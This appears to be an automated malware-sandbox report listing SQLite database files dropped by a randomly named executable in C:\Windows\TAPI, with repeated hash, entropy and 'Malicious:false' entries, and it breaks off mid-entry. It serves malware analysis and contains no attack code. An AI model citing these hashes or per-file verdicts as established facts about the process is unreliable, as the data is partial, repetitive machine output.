                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5242880
